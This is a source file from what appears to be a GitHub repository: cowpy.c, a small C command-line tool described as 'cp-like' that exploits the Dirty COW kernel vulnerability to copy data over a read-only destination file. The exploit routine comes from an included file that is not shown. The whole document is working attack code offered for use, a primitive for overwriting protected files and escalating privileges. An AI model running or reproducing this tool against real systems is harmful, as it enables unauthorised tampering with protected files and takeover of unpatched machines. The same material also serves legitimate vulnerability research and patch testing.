-
Notifications
You must be signed in to change notification settings - Fork 25
/
cowpy.c
49 lines (42 loc) · 1.04 KB
/
cowpy.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
/* cowpy - LGPL Copyright 2016-2017 - [email protected] */
/* */
/* cp-like tool exploiting the dirtycow vulnerability */
#include "os-barrier.h"
static int LOOPS = 50000;
#include "exploit.c"
#define R_MIN(x,y) (((x)>(y))?(y):(x))
int main(int argc, char **argv) {
if (argc < 3) {
printf ("Usage: cowpy [src] [dst]\n");
return 1;
}
int f = open (argv[1], O_RDONLY);
if (f == -1) {
printf ("Cannot open source\n");
return 1;
}
struct stat st;
fstat (f, &st);
int size = st.st_size;
int d = open (argv[2], O_RDONLY);
fstat (d, &st);
if (st.st_size < size) {
printf ("Warning: Destination file is too small. :(\n");
printf ("Warning: Data will be truncated\n");
}
unsigned char *buf = malloc (size);
read (f, buf, size);
close (f);
const int bs = 1024;
int i;
for (i= 0; i< size; i+= bs) {
int rc = dirtycow (argv[2], i, buf + i, R_MIN (bs,size-i));
if (rc == -1) {
printf ("Error\n");
return 1;
}
}
printf ("Done\n");
free (buf);
return 0;
}